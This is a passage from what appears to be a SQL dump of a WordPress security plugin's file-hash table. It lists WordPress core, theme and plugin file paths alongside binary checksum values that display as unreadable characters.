��ے�%�4~N�~Gh!b��:w��Ɍ��\'','',0,'?'),('S��92/*z�f�ԄC�','wp-content/themes/magazine-hoot/hybrid/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ַ���԰K���#','��\'l,N�ѡ4�->�����L8l�D�����','',0,'?'),('S��&�az8�Jض9�','wp-includes/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��AĢ<ݤ9�fK:','�6��-�Պ��涫9����W\"\'�|w�w~�E\n','',0,'?'),('S�^�7jK5I6K�2!','wp-includes/Requests/Cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]��4�G��FdW(�','1׋��0*�E�3:/��2p��կ�\0K2^�(','',0,'?'),('S��0ӽ\nq����\n�5','wp-content/plugins/wordfence/modules/login-security/css/colorbox.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<��w\ri�컎vL*x�','�N�b���\r̎�/?+\'��bi\'�W�$@�i\0','',0,'?'),('T�r���~�W]�','wp-includes/class-wp-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J0n�N.��yƪb��','�}�u\0tE\n�&���yt2���B���','',0,'?'),('T6,��`ᨉ�3r�=','wp-content/themes/magazine-hoot/js/jquery.parallax.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Gv�ic�\Z����y�q�','�d�Ŀ4@[�ڹ���b֬T�\n{�3��?M�g','',0,'?'),('T6K?���s� �7(�','wp-includes/customize/class-wp-customize-sidebar-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vj��B���ر���q','��{#�i�`��\0���j���` pǍ+�fF�','',0,'?'),('T:�Dğ.&l�\Z?�&�A','wp-content/plugins/wp-cerber/assets/flags/in.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�weIɻ�j籏��{\n','��4x�\n��<~�z����{��V��Я\"N�','',0,'?'),('T?�?:q׮P��ah\'��','wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���AN�X[`h\0����','�\"xI�B6�E?�����i�\'26�5y/��','',0,'?'),('TM����l����','wp-admin/includes/class-wp-screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O\'<r,x�ib��$','MqރR�3=E�8C�@^��@ò�~�qv�M���','',0,'?'),('Tw��=��+�6����','wp-includes/js/tinymce/wp-tinymce.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����--��T�J�;','��O���w�:�V�^�w�^[\n�	L�\'�6@-�\r�','',0,'?'),('T{\'���g,(:~�G','wp-content/themes/twentynineteen/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڈLBP��En�\\^	��P','�RSV%�6�){��O����x2��N�A���','',0,'?'),('T{��Qmc��7��0\"s','wp-content/plugins/wordfence/css/wf-onboarding.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�Kwt�G��\'�(�','��mǸ�${���&W�>�.{?�Wo�)�=�H�','',0,'?'),('T�.o@Ψ2�w�v��X�','wp-includes/js/jcrop/jquery.Jcrop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/a��Lru�4�\Z�','���Ϸ��yd�ix�{�p+��n�eځ��f�','',0,'?'),('T���vm?,�a���T4�','wp-includes/ID3/module.audio-video.quicktime.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ր��%���3/�*','Z{��[�W�ڤ�ʑ\nM%9I5+�$3�@^�','',0,'?'),('T���\r�fV�+� j�','wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gxX��JT��bx���','f��x�/�x��G�\n8�5�6�	Z�+','',0,'?'),('T�>��<�_\"g','wp-content/plugins/wp-cerber/assets/flags/nf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2���rJizڜS��','�P�w�.�^}��\Z�ފڝ3q�{���','',0,'?'),('T�.��)m�&����I','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/HttpException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�41l#}�p���zk1','��h��	�_��֚����!E��4�\Zv��F��','',0,'?'),('T܌�7`\0���(�','wp-includes/js/mediaelement/renderers/vimeo.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C9���Y�O���','���+�®-FVp�ݨIht�L�iP%K��i��6','',0,'?'),('U�\\p{J��O�Q�&','wp-includes/SimplePie/Cache/Base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�ĞA�ʖ�䦴j��','��oO��w��~9K����4oY�[K�e��\\RG','',0,'?'),('UI�_����Ym���_','wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#�W��P��2oY','�v�����4\'���w��h�<|Z�4Q8�xǃ5','',0,'?'),('Ue�tA&�R|��\rQV','wp-content/themes/twentytwentyone/assets/sass/04-elements/forms-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�1�`�Uy�+�۟��','�4_�����H1h(�p��A�9u���^�f�B','',0,'?'),('U}9,]�8��Un��','wp-content/themes/magazine-hoot/include/admin/images/3-4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��v�	��-5)|0�','��.B�ѵx��)�����u�zI[�mـ�','',0,'?'),('U�.��G\0��h7K','wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{��Dz��겊��T','s�׷my(�[�~��M������N�Ԙ��;i','',0,'?'),('U� $A=�He�|�zȖ(','wp-includes/Requests/SSL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K��������','�}I^L�\\95�N�Y���;�?z��aE=�','',0,'?'),('U�L@�bއl�HE�','wp-content/themes/magazine-hoot/hybrid/inc/functions-sidebars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ہ�L+X\'��N���','T�������:PyT��uipk[�\Z��p��R�','',0,'?'),('U�nɓb4lZ,I','wp-admin/css/about-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=&#��Tk��A=�?','�S���	`4�	:�0�U�h���p���s�ń','',0,'?'),('U�~�UO:c#3#W��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-configure-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	,�	^��R6Մ��l','�&x{�e5��ɔ�|��c��J��\Z���Ȓ','',0,'?'),('U���$i\"u��&��9','wp-includes/images/crystal/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l��ڤ�;�=','��S\rI��U��9_<�f`��&HYw�u�','',0,'?'),('U�^�� H�T�7j','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-audio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\'���Y�p','�����΃,�\"w�,��L� Rj\0��)M�o�','',0,'?'),('V	\Z��%ɡX�	,','wp-content/themes/magazine-hoot/hybrid/css/one-five-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','($�J0g�����Q�','m ��j\r�|8;�|m*��bw0�+��&��','',0,'?'),('V\n��U`�_�5���8','wp-includes/js/customize-base.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$��r�#��j	�','LF�#�53��uu��t�F	�չRk*xs_{E','',0,'?'),('V���\Z��_�R��','wp-content/themes/twentynineteen/js/priority-menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�~&*mB��T@�GI�','D(�Tu}5{������ \0+��5g7`�)�y�','',0,'?'),('V�\r�3#��J��{','wp-includes/sodium_compat/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`��NKp@}���\r�|','���a���<K�-��Ìb=7t�#�-8��/��`','',0,'?'),('V#7A�����@�?���)','wp-content/plugins/wordfence/views/unsupported-php/admin-message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(`��HMD��A�7�9','y��I~	@V�Y247�&�U��uމ����','',0,'?'),('V+_�?�g8�魋��0','wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-regular-400.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�͚�|yO���O�0O','k��B)=��aCz	i�Ĵ���?-\\cn�.v��&w','',0,'?'),('V/�\Z�h�E����)','wp-content/themes/magazine-hoot/widget/content-posts-blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o���n��j`�r�','3�# �\"h�x`IZ������d�@U���','',0,'?'),('V2�L��\0ۺ��','wp-includes/js/jquery/ui/controlgroup.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�##�=�F=��\\�v','��>733hE}���z�[)�e�Z0�ߨ!�$/Ӿ�','',0,'?'),('V8��8��ߟ\rZ�5','wp-content/themes/twentynineteen/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q��n䄼��a�','�4�x\"�#�4�ϙ��w2�E��7�l�4�1�','',0,'?'),('V?�O�N���e�ZF\\�','wp-includes/js/jquery/ui/accordion.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������Z����a��','�\"����!f�~xXW��ۜ��4�Ȗ$:��2/','',0,'?'),('VL6�7G^l%D5z3��','wp-includes/default-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�t��<�޸��!�','�^�\'U9�;dOˊSz��!S��m��>I5�\'�e�','',0,'?'),('Vne!�z0u1?��','wp-includes/shortcodes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'9A�C��zaϥ�2','@o��i\r��������}�8�n���#�\Zق','',0,'?'),('Vrm�KE�p�j��6�','wp-admin/images/w-logo-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[N�W��_p�w�0','ޣ^Q�t�3�H�unU❻��~�\'�T2','',0,'?'),('V�����댏$�x','wp-admin/js/post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~=��z�!L\Z�DAl�','�js�O�v�W��Ϗ�Sq��������','',0,'?'),('V����rz�(�nol*','wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�T^z[\"��\Zo��','A����_}��Q�\"�gV�UْP��(���6l','',0,'?'),('V׀��\'h��Ĉ+:��','wp-admin/includes/network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2n�Ֆ[�uj��7','e�M3V\"�d0����/0o���u�T�k��','',0,'?'),('V���1)�~����O','wp-content/plugins/wp-cerber/assets/wrench.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D�3�Cb�C-2!�Q�','�;�����մ��xj�E����%Z�P�c��','',0,'?'),('Ws�$8�~��Nȁ-�@','wp-includes/js/mediaelement/mediaelementplayer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�ĪL��5��!\n�','o��^:v\\���m���o����cTW[���k','',0,'?'),('W&�ִ �)+�ڱ���','wp-admin/includes/class-plugin-installer-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z1)i(o+���:','�z��d ��&,T`6BeW���S�w3\\��','',0,'?'),('W8h�!ɩk�ĉ\'�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�RU�b�*��\0\'�','x����<�s��BZ�2�j��RM\'0%$��i{ V','',0,'?'),('W;1C\\:~��D���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-logged-in-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Kۦ��81yR�','){e���`�v�)?/��;wnh�x�r���%�','',0,'?'),('WO���G���Q&-G�','wp-content/themes/magazine-hoot/hybrid/inc/class-media-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�$�@�(�2|�m�','�:s���l_����H�Z�\\bzˢ�R�t)M','',0,'?'),('Wl[_��-�콞	�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-brute-force-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�\Z�\n�����N�\r�E','h����n�#�M��p�\0j����E��!�D�','',0,'?'),('Ws��{N�hP�r�㼱','wp-content/plugins/wordfence/lib/dashboard/widget_ips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kӞw��\"���M��','z�v�l������!1L���+\0�.�i��kIj','',0,'?'),('Wx\Z�Ta��7{��','wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�|��s,�=�K#�','6���ly�6ɦi��3U���,�E[鲓9��','',0,'?'),('W{�g- X��\'=n8','wp-admin/moderation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�EVU��u�������','��Fq�6��1����<���w�t&�b����1��','',0,'?'),('W})Ӗ7���e�}5�9,','wp-admin/load-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i\r|&�Ĉ3�d!ک9�','{��uo�b��jxa��[S\'K&��S�%\nAi��','',0,'?'),('W��LjN/�@Ϣ�ư�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T	��nr�k���','�;\\��Xځ��/0;��Q�P�.�B4��\Z�','',0,'?'),('W�U��?��tl�/W >','wp-content/themes/twentynineteen/style-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a2[��6��g���','��{EolP,qh�O������F�	���Df�','',0,'?'),('W��5�Ν�>�_`|��','wp-content/plugins/wp-cerber/assets/flags/py.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����UƸ_��`U��','���s�d��-��ǁ&ǂ��v�	&l:��V','',0,'?'),('X��\\shv]�iB�','wp-content/plugins/wordfence/waf/wfWAFGeoIP2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','݇�(�0,m�G_Y�3','^�)o�B������f�g�*�V�P�?�~��u:','',0,'?'),('X4֔}�M��-r���','wp-content/themes/magazine-hoot/include/admin/images/posts-list-style-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,;񃬙{S���d','e�AX�[������&�*7-�֣/?U','',0,'?'),('X+ٴ���3��0�1�','wp-content/themes/twentytwentyone/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5qO\'1�nU�X���4','tnjҴ�%.<A���s��݅�,[��(���.�','',0,'?'),('X,�E�Cj$_��8I��0','wp-includes/images/smilies/icon_cool.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��`����ivj.�','�事F�9;2_	�$�$~�LO�a��6���_','',0,'?'),('X��M����xڳ�J�','wp-includes/Requests/Hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�� ���gx�i���','�՚���� Q�憐D�P��؂_?y�`�����','',0,'?'),('X�:8+˓2>V]��8�','wp-admin/images/sort-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Aìk�:�bтvFj','\'���aK�\0tGJ�Bq��XW*(J|1���z[(','',0,'?'),('X���v�\Zƒ��\"�$','wp-includes/Requests/Exception/HTTP/409.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�i�~*=����','���_M��8U���.pF����w�:E`�MB��','',0,'?'),('X�?M-H?���Al8/','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-acct-activity.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H|��wcC�6�ʕ','��\nA022?�rק.���jJ5�G��rZ','',0,'?'),('X���D�K#_�Ljw]@','wp-content/themes/magazine-hoot/hybrid/css/one-five-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�_\Zn���V','��*��	ˈ&f|��;�`�(|�ޡ(����','',0,'?'),('X�s��Yq���ePL','wp-includes/blocks/code/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �2z`������A�%�','W��@\r�8�Q��u�\0H� �WhR��ے0c���','',0,'?'),('X���G������z�X','wp-admin/includes/class-wp-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P=�&��\\��.�_I','��fJ��\n\'-�#?�%�7����{�}\\٤�$�','',0,'?'),('X�~�Vzl!_�]/�-3','wp-content/plugins/wordfence/models/firewall/wfFirewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k(ʫ�ݑ伉����\"','�ڴ��\'��(X�����\"��Ocn,Mq`�D�','',0,'?'),('X�k(D��qț��G��','wp-includes/js/jquery/ui/slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}�U���Ƥ����','��f,p��`��qR��2�\Z^v�6��`��s�$','',0,'?'),('X�=�2h4�/{�+','wp-includes/spl-autoload-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6��u�{�t���','��,�Z\rM	>܅��g�p�/�	Z\Z#`!�.','',0,'?'),('X�TCW_^��og��','wp-admin/includes/class-wp-debug-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�:�UJNJt���ѷ','��_�.C��=�v<^(���6�.�Dه� �','',0,'?'),('Y����bڧ,��J','wp-includes/Requests/Exception/HTTP/405.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8т�m!�Ҭ����','j�b�횄��^U�sv8�$b����M�3y�','',0,'?'),('Y&�6��ڳ��6����','wp-content/plugins/wp-cerber/assets/flags/mg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_��;��P�IH\\�','�d|�-uc�P�����V����Oh�`��_','',0,'?'),('Y(�K���g\0��_��','wp-includes/js/dist/annotations.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%e���F�\"�8�]','�U��8�E�]�\0{\"�2��Eh��$���*�\'�H','',0,'?'),('Y,Qp�gmu#�e���~','wp-includes/widgets/class-wp-nav-menu-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8x$�9�hQ&�','n~��B�Ȳ���|�4�[�U�`\0�2�J۷�','',0,'?'),('Y/�ޑ�	���\Z���','wp-includes/js/dist/escape-html.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E����e����c�k�','8:���\Z�U$D_�t���8(f4�}%Uә�','',0,'?'),('YBt\n�\nc�ݟ.��vi','wp-content/plugins/wordfence/views/diagnostics/text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�R�<�)��Yf�8�','�,�Iq0\r8i;[K.�4?t�\\.ZH\Z','',0,'?'),('YN.�bCX#��.�','wp-content/themes/magazine-hoot/hybrid/customize/control-checkbox-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r��C_h畸��>��','9�`�8��QDL0��Zq@��\"�v,��F+��','',0,'?'),('YV�2��9}D8�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=on~Z���TOQ�Be','�<�H���\"��F�@����%���1`7<��	��}','',0,'?'),('Y�La���h�(','wp-admin/edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oۖ���e�y�V�Bnt','���p�S��p>�5��\r��+El�VI��5V�','',0,'?'),('Y�,�e�A��w�`���','wp-includes/images/media/archive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9����h�\0��ì�u','\0�Bb�3��\'��\'��)JG ��](G�9Pr2 s','',0,'?'),('Y�BWy	+�B�Om�z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��:��N�\'�Dx��N','�[��_|А�~E����+�~�E�(�`�_��','',0,'?'),('Y�68�H;%,�_c\n�','wp-includes/css/wp-auth-check.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j��b�u��=�`c','�\r[�B�{\'C�N5zZw� pȈ��I�K�e ��','',0,'?'),('Y�J+{�o(�A%f�e�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dܹ<9N1g�%�C���','o�c��̺m�J �\nK�\"�Fו�Kc�E��','',0,'?'),('Y����]���ŞI���','wp-includes/js/jquery/ui/effect-slide.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;I^�\Z+:C��)H[','Y��� �%��!���d!F��r`�݀��4','',0,'?'),('Y֝��U����}�r/','wp-includes/SimplePie/Cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	��~ܯ{ʹ���+h�','�md�����n�nun�pU0 l��6���Zi�R','',0,'?'),('Y�UL�5J�ޔ�v[�','wp-includes/rest-api/search/class-wp-rest-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��x&����{\n�x�\\','�sޢ���zj�λ�\'Ҳ���wE�?��','',0,'?'),('Y�>1�7{6\">�2f*�:','wp-content/plugins/wp-cerber/assets/flags/uy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','txd)b}PJ��kJ@�8','	�ꬬ0�b���\0J��dczE�!(C��P','',0,'?'),('Z4<n?e�����','wp-content/plugins/wordfence/lib/wfConfig.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r����k�P$f��','�ڷ�s,9��a�a�8�ˬ�<�+��p�ql�','',0,'?'),('Z9���}.��J��k=�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8I��\Z\n�ӣ�','i>z���R�@������k�W��6u�k�y�','',0,'?'),('ZD�:-h�${�ma�','wp-content/plugins/wordfence/images/sort_desc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?զ�)X�?�N�','b�EԚ�B�#:�(�#�=_(�\Z���|��U�#�','',0,'?'),('ZP�e2I�� ��[͠�','wp-content/themes/twentytwentyone/assets/sass/07-utilities/a11y.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ТWHKC�}��&�%��','��$�FT���~K�K�`��e�c=��;���;','',0,'?'),('ZY�<}���*a�F���','wp-content/plugins/wp-cerber/assets/ajax-loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��:d�b���EF�R','��z��kG��� �A�Kyh��b��a��h','',0,'?'),('Zp_Z	JI����q�m`','wp-content/plugins/wp-cerber/assets/flags/pa.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�Y]�v\"���','���.oC���]1%�lЕ�Ul��\Z������#','',0,'?'),('Zx��1�2K�Z�,��','wp-includes/customize/class-wp-customize-header-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�\0W>$����l�^ҳ','Qy(u�&���v�ӳ\'-�}�hՒ��X��t�','',0,'?'),('ZҌ�[��\nv���	F','wp-includes/SimplePie/gzdecode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��rF<�\ZiǨu��','|��R\'gAE�ێ���q��q�T!��:�O0�_','',0,'?'),('Z�_\"��~�J�����','wp-includes/js/wp-custom-header.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KO��x �3��y;9�','��X$A���\r\"N��e�$ߦ��+���L(','',0,'?'),('Z�~Y/l����*�&�','wp-content/plugins/wp-cerber/assets/flags/vn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f6J%��C���v,\nc','�_���1:�L��v�Q��ܺ�.����|','',0,'?'),('Z��я�ݒ��S�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�\Z^Z�HG�%�O�','�m���c�;�\ny㐲��0,�5���F|=�C','',0,'?'),('Z����� %/�Z�z9��','wp-admin/includes/taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/a�ag�����','��	T+�ݟ���v$L�3���G��!�j��','',0,'?'),('Z�\0��Y���� æfg','wp-includes/js/crop/marqueeVert.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\0���9��R���','K�cg$�e���2\\p�$�1z�����`CkJ�','',0,'?'),('Z�˚�6�����*3��','wp-content/themes/magazine-hoot/include/admin/images/pageheader-both.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>P�l���\0\'%�','��Z��P�����E\0�*T��ŭ*��\"rh>p','',0,'?'),('Z�u=�7��0�','wp-content/themes/twentytwentyone/assets/sass/03-generic/vertical-margins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����>�����y��','�+a�R�\"�͋kDxgd]��h���E�_#','',0,'?'),('Z�R���r(�&b��:�-','wp-includes/css/dist/format-library/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6���F۔�\'�V��','�h�}����]�ާ֚��$_8Znyi�E�4V����','',0,'?'),('Z��=ӧ�rc\"��y�','wp-includes/IXR/class-IXR-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��VdB+A�J?��#','��{~�(#�\Z6u����,����?�jk2��`','',0,'?'),('[̉��$���\'��','wp-content/themes/twentynineteen/sass/navigation/_next-previous.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ɚ�u\\	���','c�V�����x�y(#il8L}e޷��','',0,'?'),('[�G���e�a\'�i��','wp-includes/js/jquery/ui/datepicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4P1,ٝ�`x����','�]w\'��d�<s��6�>4Sڭ���s��/�=��','',0,'?'),('[��|8E��>�F','wp-content/themes/magazine-hoot/template-parts/error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0X7�]Lpƹ��','nC�z�x��4�:�l��?�ȶ(�1�Z\\Jd�','',0,'?'),('[\'L�F�d�+���k','wp-content/plugins/wp-cerber/assets/flags/li.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�f�9�%��QZ!�;','�`A��/�\\) 5/�����簤��GJ���`�','',0,'?'),('[5���Y�Nh���K�M�','wp-includes/customize/class-wp-widget-area-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<w܌*�t���!�','44�w�Vv�Oa5G��39��I����=�5��i','',0,'?'),('[>�����w��A6�','wp-content/themes/magazine-hoot/hybrid/extend/customize/control-preset-pattern.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݣ�@\0k�aHo�}C�','ƒ�JI�[��RА�����%U��Ý�)�m�','',0,'?'),('[w�[ᄅ�\r	|2I�)','wp-content/plugins/wp-cerber/assets/flags/hu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C��.F��L\nc��Q','�g.XaMw�Ma-#lW���=���h��1�U�h','',0,'?'),('[��#ܧ\Z>]��<�','wp-admin/css/colors/ectoplasm/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1/�?n�.�EL�-��','t$�yC�\0.J���.�O��}��\"g�=�','',0,'?'),('[�>�x�;�wn/t�H','wp-includes/js/wp-emoji.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+g�D>�w�f�م*�D','M�aF��$�*�M��_�����n8���v�u�','',0,'?'),('[��$c�qr��9h���','wp-content/plugins/wordfence/js/jquery.qrcode.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Թ���Xp`me<','wP\0�p�zuYDS�z(W�ߥ��P�3$S����','',0,'?'),('[���1�YAdk�,','wp-includes/SimplePie/Sanitize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�l����fp��x��','���O\nQp���5�A�~������j��xt�','',0,'?'),('[�Y��44�Or��l0�','wp-includes/Requests/Exception/HTTP/414.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]U�@���)��#h','��H������i���c�!��I).eh������','',0,'?'),('[ꠏ�|K�o�یb7�','wp-admin/user/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xCS6�LC�2!�u�','�`K����y2M��p